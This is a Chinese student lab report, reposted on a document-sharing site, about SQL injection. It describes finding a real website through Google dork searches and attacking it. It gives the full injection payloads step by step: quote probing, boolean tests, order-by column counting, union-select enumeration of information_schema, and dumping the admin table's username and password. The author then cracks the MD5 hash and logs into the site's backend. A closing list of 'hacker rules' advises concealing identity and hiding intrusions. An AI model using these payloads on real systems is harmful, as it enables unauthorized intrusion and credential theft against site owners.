实验四 SQL注入实例Word下载.docx

上传人:b****3 文档编号:18437284 上传时间:2022-12-16 格式:DOCX 页数:13 大小:3.57MB
下载 相关 举报
实验四 SQL注入实例Word下载.docx_第1页
第1页 / 共13页
实验四 SQL注入实例Word下载.docx_第2页
第2页 / 共13页
实验四 SQL注入实例Word下载.docx_第3页
第3页 / 共13页
实验四 SQL注入实例Word下载.docx_第4页
第4页 / 共13页
实验四 SQL注入实例Word下载.docx_第5页
第5页 / 共13页
点击查看更多>>
下载资源
资源描述

实验四 SQL注入实例Word下载.docx

《实验四 SQL注入实例Word下载.docx》由会员分享,可在线阅读,更多相关《实验四 SQL注入实例Word下载.docx(13页珍藏版)》请在冰豆网上搜索。

实验四 SQL注入实例Word下载.docx

搜索语句可以是:

inurl:

index.php?

id=

或inurl:

show.php?

id=

下面是我找的一个例子,供大家参考:

实验演示:

第一步:

寻找可以入侵的网站。

打开PHP类型的网址,在注入点后加一个单引号(‘)按回车。

如果网页出错,那么该网站有漏洞。

下面是我选的网站的截图比较,正常网页如图1所示,加(‘)出现的错误网页如图2所示。

图1

图2

第二步:

进一步验证此链接是可以注入的。

(与运算)

(1)在注入点后加“+and+1=1”页面显示正常,如图3所示。

图3

(2)在注入点后加“+and+1=0”,页面显示错误,如图4所示。

图4

第三步:

获得字段数

在注入点后面加入“+order+by+1”,页面显示正常,如图5所示。

图5

(2)注入点后面换成“+order+by+20”,出现错误界面,,如图6所示。

图6

(3)用二分法进一步判断出现错误的字段数,再注入点后面换成:

“+order+by+10”,“+order+by+5”,“+order+by+8”,“+order+by+9”,页面均显示正常,说明,正确的字段是1,2,3,4,5,6,7,8,9。

如图7所示。

图7

第四步:

获得显示位

再注入点后面加入“+and+1=2+union+select+1,2,3,4,5,6,7,8,9”,如图8所示,显示的数字即是显示位:

2,4,7

图8

第五步:

获得该网站数据库的名字、版本、数据库所在路径等

下面是获得数据库信息的一些函数:

user()数据库用户名

database()当前使用的数据库名

version()数据库版本

datadir()或@@datadir数据库数据所在路径

basedir()或@@basedir数据库安装路径

在出错的字段位置加上上面的函数,即可获得相对应的信息,如图9所示

图9

第六步:

获得当前使用的数据库名的hex值,并暴漏该网站数据库的字段名

(1)数据库名的还原需要使用协助工具:

小葵多功能转换工具,把当前使用的数据库名jmjt转化为:

0x6A6D6A74,转换结果如图10所示。

图10

(2)注入点后面加下面的公式获得数据库的字段名:

“+and+1=2+union+select+1,GROUP_CONCAT(DISTINCT+table_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_schema=0x6A6D6A74”(数据库表名的hex值)

GROUP_CONCAT(DISTINCT+table_name)放在显示位

即可获得相对应SQL数据库中的字段名,如图11所示。

报表中的具体字段显示如图12。

图11

图12

第七步:

在所有的字段中找数据库管理员的用户名,并获得hex值

找到管理员的字段名(管理员:

administrator)

猜测:

这个很显然就判断是useradmin(大多数),因为大多数人都是admin、user、Pass等一些常用单词搭配一起标记。

把管理员的字段名再次使用小葵多功能转换工具获得其hex值,如图13所示。

图13

第八步:

借助管理员用户名的hex值,获得字段useradmin的子字段

注入点后面加下面公式获得管理员的子字段:

“+and+1=2+union+select+1,concat(GROUP_CONCAT(DISTINCT+column_name)),3,4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x7573657261646D696E”(管理员用户名的hex值)

concat(GROUP_CONCAT(DISTINCT+column_name))放在显示位

获得的子字段显示如图14所示。

图14

第九步:

从管理员的子字段中获得管理员的登陆账号和密码

从上面的子字段中不难看出,子字段中有账号和密码,在注入点后面加上下面公式

“+and+1=2+union+select+1,concat(Uname),3,concat(Upwd),5,6,7,8,9+from+useradmin”获得管理员的登录名和密码如图15所示。

图15

第十步:

进一步把十六进制显示的密码的密文进行解密

使用下面的MD5解密工具的链接把密码的密文解密,使用网址:

或者,把十六进制显示的密码的密文输入编辑查询框中进行查询,查询结果如图16所示。

图16

最后一步:

使用“啊D”工具扫描后台,

(1)打开“啊D”工具,点击“管理入口”进行扫描

(2)找到管理员的登陆界面如图17所示,输入账号和密码可进入该网站的后台如图18所示。

图17

图18

这样就是成功入侵了一个网站!

你可以上传图片、文章、视频等等。

前台可以看到,这里我就不实现了。

在后台你可以对网站管理员进行密码重置设置,但是建议你不要这么做!

入侵网站注意事项:

1.不恶意破坏任何的系统,这样只会给你带来麻烦。

恶意破坏他人的软件将导致法律责任,如果你只是使用电脑,那仅为非法使用!

注意:

千万不要破坏别人的软件或资料!

2、不修改任何的系统档,如果你是为了要进入系统而修改它,请在达到目的后将它改回原状。

3.不要轻易的将你要hack的站台告诉你不信任的朋友。

4.不要在bbs上谈论你hack的任何事情。

5.在post文章的时候不要使用真名。

6.正在入侵的时候,不要随意离开你的电脑。

7.不要在电话中谈论你hack的任何事情。

8.将你的笔记放在安全的地方。

9.想要成为hack就要学好编程和数学,以及一些TCPIP协议、系统原理、编译原理等知识!

10.已侵入电脑中的帐号不得清除或涂改。

11.不得修改系统档案,如果为了隐藏自己的侵入而做的修改则不在此限,但仍须维持原来系统的安全性,不得因得到系统的控制权而将门户大开!

12.不将你已破解的帐号分享于你的朋友。

13.不要侵入或破坏政府机关的主机。

14.不会编程的黑客不是好黑客。

15.黑客不同于“盗”

16.最重要的一点,不要入侵有关政府的网站

实验总结:

1、 

此次的课题研究让我了解了SQL注入攻击的原理和过程,让我了解到了做这方面的时候需要注意的安全性问题,也意识到安全的重要性和数据库的一些缺点,提高了自己在这方面的安全意识。

2、 

在实验的过程中遇到了很多困难,配置上的,环境上的,还有一些需要注意的小问题,而且从整个课题研究的过程来讲也涉及到了很多软件的配合使用。

3、 

整个实验过程花费的时间还是不少,需要找可以注入的网站等,对于没有了解过网站的我来说还是有一定挑战性的,但整个实验的过程让我对网站中存在的安全产生了很大感兴趣。

4、 

很高兴顺利完成了这次课题研究,期待下次能使用更高级的工具进行扫描实施攻击,以后的研究过程中也要特别注意这些脆弱点了。

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 考试认证 > 公务员考试

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1